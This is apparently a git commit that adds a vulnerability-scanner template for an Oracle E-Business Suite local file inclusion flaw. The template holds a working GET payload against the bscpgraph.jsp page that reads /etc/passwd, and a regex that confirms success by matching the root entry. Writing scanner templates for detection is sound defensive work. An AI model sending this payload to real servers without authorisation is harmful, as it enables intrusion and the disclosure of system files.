Add Oracle-EBS LFI

patch-1
Hacker2202 2020-10-07 21:59:39 +00:00
parent 72dc5d307b
commit 4b42f6852a
1 changed files with 18 additions and 0 deletions

View File

@ -0,0 +1,18 @@
id: oracle-ebs-bispgrapgh-file-read
info:
name: Oracle EBS Bispgraph File Access
author: "Tirtha Mandal - https://twitter.com/tirtha_mandal"
severity: critical
description: todo
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body